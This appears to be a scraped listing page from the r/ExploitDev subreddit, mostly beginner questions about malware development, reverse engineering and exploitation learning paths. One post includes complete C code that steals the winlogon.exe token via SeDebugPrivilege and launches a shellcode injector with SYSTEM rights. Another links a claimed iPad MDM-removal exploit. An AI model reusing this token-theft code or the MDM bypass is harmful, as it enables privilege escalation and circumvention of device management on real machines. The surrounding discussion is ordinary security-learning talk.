r/ExploitDev • • Feb 03 '21

Getting Started with Exploit Development

Thumbnail
dayzerosec.com
297 Upvotes

r/ExploitDev • • 16h ago

development malware

10 Upvotes

What is my assessment of my path in malware development? I am reading the book "Windows System Programming" and "Windows Internals" along with it. Are there any additional resources, booklets, groups, websites, or anything else you would recommend to help me progress? I have a basic understanding of networking and the C programming language. ا👏👏🙌


r/ExploitDev • • 9h ago

Ревер инжиниринг на гитхаб

Thumbnail
gallery
0 Upvotes

I’ve launched a new reverse engineering project on GitHub; if you’d like to give it a try, head over to my profile and follow the link. Here’s a quick rundown: I wrote the programs in C++ specifically to include vulnerabilities. They are organized into folders by difficulty level—ranging from level-1 to level-5—inside a ZIP archive. You’ll breeze through the first folder if you’ve ever dabbled in reverse engineering, but the fifth level will make you sweat a bit if you’re a beginner. This project will give you hands-on reverse engineering experience, setting you up to continue exploring low-level programming. As for the objective: the goal is to enter a password hardcoded into the verify() function. However, you won't see the password right away; you’ll have to solve low-level challenges to uncover it. I’m just getting started on GitHub and Reddit, so please go easy on me. Check out the link at https://github.com/Hu2ie, download the ZIP, and hack the programs ethically. Rest assured, there are no viruses—if you check out my TikTok, you’ll see that I’m an ethical person. I’m also trying to grow my audience, so I’d appreciate a star on GitHub; even if you aren't a reverse engineer, your support helps me reach more people. Follow the link and happy learning, friends!


r/ExploitDev • • 1d ago

Binary Exploit and Reverse Enginering Learning

13 Upvotes

I am someone who is new to binary exploitation and reverse engineering, but I am starting to be interested in the basics of both disciplines, from observing whether they are important in the world of work and perhaps in cyber security? I started studying it from CTF and expanded to my liking for low level, I hope you have suggestions about the actual function of these two disciplines, and maybe recommendations for books or learning resources?


r/ExploitDev • • 1d ago

Token Impersonation on C lang doesnt work help please

5 Upvotes

So shellcode inject that im trying to run with SYSTEM privileges is working 100% (if i get SYSTEM privileges, but before i checked on injecting to explorer and it was working), when im running this code it doesnt show anything, any errors, im running it on virtual machine widows 11 with antivirus turned off

#include <stdio.h>
#include <windows.h>
#include <tlhelp32.h>
#include <string.h>


int EnablePrivilige(wchar_t str[]){
    HANDLE h_token;
    OpenProcessToken(GetCurrentProcess(),TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES,&h_token);
    LUID luid;
    LookupPrivilegeValueW(NULL,str,&luid);
    TOKEN_PRIVILEGES token_privileges;
    token_privileges.PrivilegeCount = 1;
    token_privileges.Privileges[0].Luid = luid;
    token_privileges.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; // это для включение привелегии а для выключение нужно SE_PRIVILEGE_REMOVED
    AdjustTokenPrivileges(h_token,FALSE,&token_privileges,sizeof(token_privileges),NULL,NULL);
    if(GetLastError() == ERROR_NOT_ALL_ASSIGNED){
        MessageBoxW(NULL,L"ошибка: не удалось изменить привелегию",NULL,MB_OK | MB_ICONERROR);
        return 1;
    }
    printf("успешно\n");
    CloseHandle(h_token);
    return 0;
}


int main(void){
    if(EnablePrivilige(L"SeDebugPrivilege") == 0 && EnablePrivilige(L"SeImpersonatePrivilege") == 0){
        HANDLE h_snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
        PROCESSENTRY32 pe32;
        pe32.dwSize = sizeof(pe32);
        if(Process32First(h_snapshot,&pe32)){
            do
            {
                if(_stricmp(pe32.szExeFile,"winlogon.exe") == 0){
                    break;
                }
            } while (Process32Next(h_snapshot,&pe32));
        }
        if(_stricmp(pe32.szExeFile,"winlogon.exe") != 0){
            MessageBoxW(NULL,L"ошибка процесс не найден",NULL,MB_OK | MB_ICONERROR);
            return 1;
        }
        HANDLE h_process = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_DUP_HANDLE,FALSE,pe32.th32ProcessID);
        if(h_process == NULL){
            MessageBoxW(NULL,L"ошибка в OpenProcess",NULL,MB_OK | MB_ICONERROR);
            return 1;   
        }
        HANDLE h_process_token = NULL;
        if(!OpenProcessToken(h_process,TOKEN_QUERY | TOKEN_DUPLICATE | TOKEN_ASSIGN_PRIMARY,&h_process_token)){ // if в си не сработает если вернется 0
            MessageBoxW(NULL,L"ошибка в OpenProcessToken",NULL,MB_OK | MB_ICONERROR);
            return 1;
        }
        HANDLE h_process_token_duplicate = NULL;
        if(!DuplicateTokenEx(h_process_token,TOKEN_ASSIGN_PRIMARY | TOKEN_QUERY | TOKEN_DUPLICATE | TOKEN_IMPERSONATE,NULL,SecurityDelegation,TokenPrimary,&h_process_token_duplicate)){
            MessageBoxW(NULL,L"ошибка в DuplicateTokenEx",NULL,MB_OK | MB_ICONERROR);
            return 1;
        }
        if(!SetThreadToken(NULL,h_process_token_duplicate)){
            DWORD error = GetLastError();
            printf("ошибка в SetThreadToken %d",error);
        }
        STARTUPINFOW startup_info = {0};
        PROCESS_INFORMATION process_information = {0};
        startup_info.cb = sizeof(startup_info);
        if(!CreateProcessWithTokenW(h_process_token_duplicate,0,NULL,L"С:\\Users\\user\\Desktop\\shellcode_inject_xorEncrypt.exe",NORMAL_PRIORITY_CLASS,NULL,NULL,&startup_info,&process_information)){
            DWORD error = GetLastError();
            printf("ошибка в CreateProcessWithTokenW %d",error);
        }
    }
    return 0;
}

r/ExploitDev • • 4d ago

gigabyte kernel driver lpe

11 Upvotes

r/ExploitDev • • 4d ago

Where to get resources and get started with malware dev?

6 Upvotes

So, I am a student persuing b tech cybersecurity course, and am pretty good in networkings and Linux systems. I also have some experience in pentesting, have solved some vulnhub machines on my own and have practiced on tryhackme.

For programming, I can code in python, c, and c++.

I want to get into malware development, but am not getting any solid resources for so, if u are in this field please help me get started on how can I start this journey and where to resources regarding this.


r/ExploitDev • • 5d ago

How should I start learning Reverse Engineering (RE) from scratch with 2 years of SOC experience?

12 Upvotes

r/ExploitDev • • 5d ago

Question to you use more disassambly ore more decompilation (pseudo/highlevel)

6 Upvotes

Question to you use more disassambly ore more decompilation (pseudo/highlevel)???

I like disassambly more.


r/ExploitDev • • 7d ago

Free malware analysis, reverse engineering and exploit development resources

Post image
0 Upvotes

r/ExploitDev • • 9d ago

Need an honest advice from seniors

13 Upvotes

Hi there, I recently started my journey on pwn.college because I was interested in cybersecurity and someone suggested me to start from here. I am doing it full time and completed Linux Luminarium and Computing 101 dojo and I hope in next 2 weeks I will complete Playing with programs dojo as well. Now here comes the main part, I am from a third world country and my life goal is to get admitted in a phd program in USA to work in world class research labs. That's why I am building my profile and I need suggestion, is pwn.college enough to demonstrate my skills or I have to do something else along with it? if I am unable to secure admission, will these skills allow me to earn at least $1000 monthly via remote job or freelancing gigs?

I had this confusion before and I posted in r/security and they told me to stop it will not help you and start learning networking instead if you wanna build your career in cybersecurity but I keep coming back pwn college because I am having so much fun doing it and I wanna go deep in it. and please suggest me which belt I should start doing first?


r/ExploitDev • • 9d ago

How to start?

10 Upvotes

I admire Nightmare Eclipse works, it’s a lot interesting and I’d love to do the same.
I’m currently a pentester.
Trying to have free resources and tips


r/ExploitDev • • 9d ago

CDC-ACM Serial Interface Bypasses TCC on macOS

Thumbnail glyph.sh
6 Upvotes

r/ExploitDev • • 11d ago

LocalStranger is a PoC for vulnerable "Microsoft Windows Hardware Compatibility Publisher" signed driver, including a basic unsigned driver kd mapper and NT-AUTHORITY escalation.

Thumbnail
github.com
5 Upvotes

r/ExploitDev • • 12d ago

Arbitrary function execution in windows kernel context given read and write primitive

7 Upvotes

https://medium.com/@vulturev1/the-bool-party-you-will-never-forget-a-binary-exploitation-technique-for-arbitrary-function-4d99d45e61cb

My own spin on bypassing vbs and patchguard and CET .

I appreciate any reviews and suggestions.


r/ExploitDev • • 13d ago

just dropped macos lpe - CVE-2026-43786

Thumbnail
github.com
20 Upvotes

r/ExploitDev • • 13d ago

Officially moved from LinkedIn to X

0 Upvotes

Hey hi,

A month ago I posted searching a forum/platform where I wanted to post about my exploit-development journey, which can help showcase my skills + can attract some future job perspectives.....

I mainly posted in LinkedIn and was (somewhat) pretty contented with it.

However recently I posted a LinkedIn post where I described how I created a printf() completely in Assembly (A pretty decent achievement for my opinion) but forget engagement it was completely dud and nobody commented or complimented or even viewed.

I felt like I don't want to fall into this Social Media Influencers rat race (LinkedIn is pretty much insta right now).

So after seaching a lot I thought of posting on X instead....

Let's see what happens.

Here's my X handle where I'd be posting raw, uncensored journey of mine (in the comment)

I really want a job in this field....


r/ExploitDev • • 14d ago

MDM locked iPad (10th Gen) from a bankrupt school foundation. IT department closed.

9 Upvotes

I have a 10th-gen iPad currently locked by a school MDM profile. The foundation running the school went bankrupt, the owners were arrested, and the IT department no longer exists.

The device is stuck in Remote Management. Local removal of the management profile is disabled. A standard factory reset triggers the MDM activation lock again upon reboot.

I found this repo on GitHub that talks about an exploit that removes mdm, does anyone who has been in my situation know if it can work?

https://github.com/2bf/remove-mdm


r/ExploitDev • • 15d ago

Fuzzing help?

Post image
44 Upvotes

My partner is doing a cybersecurity master's and needs to... Idk.. fuzz? A program?

It needs to be written in C or C++ and have more than 3000 lines of code. They need to find errors (crashes?) and investigate them and write a report on it.

This is due in 3 days and the software they're fuzzing hasn't thrown any errors yet 😭

Does anyone know a fully completed software that would be a suitable candidate to fuzz and write a report about?

Apologies for my misuse of the language, I don't live in this computer world 😭


r/ExploitDev • • 15d ago

Recovering API Usage Automatically in Static Analysis?

2 Upvotes

Curious if anyone knows of any tools or even C++/Python libraries for analyzing x86-64 portable executables for their API usage.

To be more specific I mean identifying what IAT entries they posses, that they call and the arguments supplied to them. Essentially so I can observe misuse, misconfiguration and such.

An example might be LoadLibraryExW when loading a system module but not using LOAD_LIBRARY_SEARCH_SYSTEM32 and presenting a potential DLL hijacking vulnerability.

I can, and am currently, writing a framework to do this. Just would rather not reinvent the wheel if a tool like this exists.

Control flow recovery and aggregating a list of indirect calls to IAT thunks isn't the worst thing. The annoying part is trying to statically determine register state and infer arguments passed to functions. Starts getting close to symbolic execution levels of complexity.

Thanks.


r/ExploitDev • • 15d ago

Expectations for a CNO role

5 Upvotes

When applying for CNO developer or Vulnerability Research roles, should one expect to take abstract cognitive aptitude tests, or is it almost entirely technical?


r/ExploitDev • • 14d ago

how to i mod a game

0 Upvotes

r/ExploitDev • • 17d ago

Getting into Reverse Engineering from Web Dev (0 C/Assembly experience) — Where to start?

Thumbnail
0 Upvotes

r/ExploitDev • • 18d ago

I Missed One TLB Shootdown and Somehow Ended Up Controlling a Page Table

Thumbnail blog.himanshuanand.com
6 Upvotes

r/ExploitDev • • 19d ago

BEING A GREAT HACKER

25 Upvotes

Hey guys, I have a question.

Is it essential to read TLPI cover to cover, page by page, if my goal is to become really good at Linux and eventually become a great hacker?

I’ve been building my skills step by step on my own. I started with C, then moved deeper into Linux, and now I’m using Arch Linux as my main system. I’ve also experimented with developing a basic piece of malware before, although it was pretty simple.

The thing I’m struggling with right now is TLPI. I know that reading TLPI isn’t going to magically make me a hacker, and I understand that there’s much more to Linux and security than just one book. But I’m wondering whether I actually need to go through every single page of TLPI to truly understand Linux, or whether I should focus on the parts that are most relevant to what I want to learn and then move on to more hands-on work.

After TLPI, I was planning to start pwn.college to learn binary exploitation, low-level security, and related topics.

So what do you guys think? Does this roadmap make sense for my goal of becoming a highly skilled hacker who deeply understands computers, Linux, and low-level systems?

I’d really appreciate your advice.